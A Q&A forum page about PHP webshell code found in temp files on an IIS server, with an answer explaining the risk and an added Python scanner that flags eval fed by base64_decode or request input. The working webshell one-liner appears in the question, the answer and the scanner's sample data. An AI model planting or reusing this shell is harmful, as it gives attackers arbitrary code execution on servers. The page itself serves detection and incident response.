Mark_1

Reputation: 643

PHP code contained in phpXXXX.tmp files in temp directory

I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp.

Looking into the contents I find a number followed by some PHP code; the following code appears in several files:

9990000
<?php
    $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.

Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?

I don't know if it is relevant, but we are running PHP 5.5 on IIS.

Upvotes: 8

Views: 5873

Answers (1)

samlev

Reputation: 5942

Short story: your server may have already been compromised.

Those are PHP shells: mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.

The key parts to understanding the shell are:

$xsser=base64_decode($_POST['z0']);
@eval("\$safedg = $xsser;");

It accepts any code at all from a $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.

It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.

So what to do about it? Check your server logs; if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site and lock them down (require user authentication, etc.). Then, if you're certain that you're compromised, don't bother trying to clean it: spin up a new server and migrate your clean code, important files, and data to the clean server.

Upvotes: 7
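The answer's advice is to look for files like this and treat them as evidence of a compromise. The following scanner is an added example written for this page, not code from either poster: it walks a directory and flags any file in which `eval()` is fed from `base64_decode()` or directly from request input (`$_POST`, `$_GET`, `$_REQUEST`, `$_COOKIE`), which is exactly the pattern of the shell quoted in the question. The `phpXXXX.tmp` file-name filter is an assumption generalised from the single name in the question (`phpA3F9.tmp`); the sample files written into a scratch directory are constructed for the demonstration, and the first of them is the shell text from the question verbatim.

```python
"""Flag PHP webshell indicators (eval fed from base64_decode / request input) in a directory."""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Optional

# Indicators taken from the shell quoted in the question: request input,
# base64_decode(), and eval() (optionally with PHP's '@' error suppression).
INDICATORS = {
    "eval": re.compile(r"@?\beval\s*\(", re.IGNORECASE),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.IGNORECASE),
    "request_input": re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE),
}

# Assumed name pattern for PHP upload temp files on Windows (generalised from phpA3F9.tmp).
TMP_NAME = re.compile(r"^php[0-9A-F]{1,4}\.tmp$", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    indicators: List[str]      # which INDICATORS matched
    has_php_open_tag: bool     # '<?php' present, so the file is directly runnable PHP


def classify_text(text: str) -> List[str]:
    """Return the indicator names present in the text (empty list if none)."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_shell_like(hits: List[str]) -> bool:
    """eval() on its own is common in legitimate code; flag it only when it is
    combined with a decoder or with raw request input, as in the quoted shell."""
    return "eval" in hits and ("base64_decode" in hits or "request_input" in hits)


def inspect_file(path: str) -> Optional[Finding]:
    with open(path, "rb") as fh:
        data = fh.read(64 * 1024)  # shells of this kind are tiny; cap the read
    text = data.decode("utf-8", errors="replace")
    hits = classify_text(text)
    if is_shell_like(hits):
        return Finding(path, hits, "<?php" in text)
    return None


def scan_dir(directory: str, only_php_tmp_names: bool = False) -> List[Finding]:
    """Walk the directory; optionally restrict to phpXXXX.tmp-style names."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if only_php_tmp_names and not TMP_NAME.match(name):
                continue
            finding = inspect_file(os.path.join(root, name))
            if finding is not None:
                findings.append(finding)
    return sorted(findings, key=lambda f: f.path)


# Constructed sample files: the shell from the question, a benign binary upload,
# and a benign PHP file that uses base64_decode() without eval().
SAMPLES: Dict[str, bytes] = {
    "phpA3F9.tmp": (
        b"9990000\n<?php\n    $mujj = $_POST['z']; if ($mujj!=\"\") "
        b"{ $xsser=base64_decode($_POST['z0']); @eval(\"\\$safedg = $xsser;\"); } ?>"
    ),
    "php1B2C.tmp": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + bytes(32),
    "token.php": b"<?php $raw = base64_decode($_GET['t']); echo strlen($raw);",
}


def demo() -> List[str]:
    """Write the constructed samples to a scratch directory, scan it, return flagged names."""
    with tempfile.TemporaryDirectory() as scratch:
        for name, body in SAMPLES.items():
            with open(os.path.join(scratch, name), "wb") as fh:
                fh.write(body)
        return [os.path.basename(f.path) for f in scan_dir(scratch, only_php_tmp_names=True)]


if __name__ == "__main__":
    for flagged in demo():
        print("shell-like file:", flagged)
```

Run it against the real temp directory with `scan_dir(r"C:\Windows\Temp")` (or whatever `upload_tmp_dir` points at on the server) instead of `demo()`. A hit in a temp directory is a lead, not proof by itself; as the answer says, the web server logs are where you confirm whether such a file was ever reached and executed.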
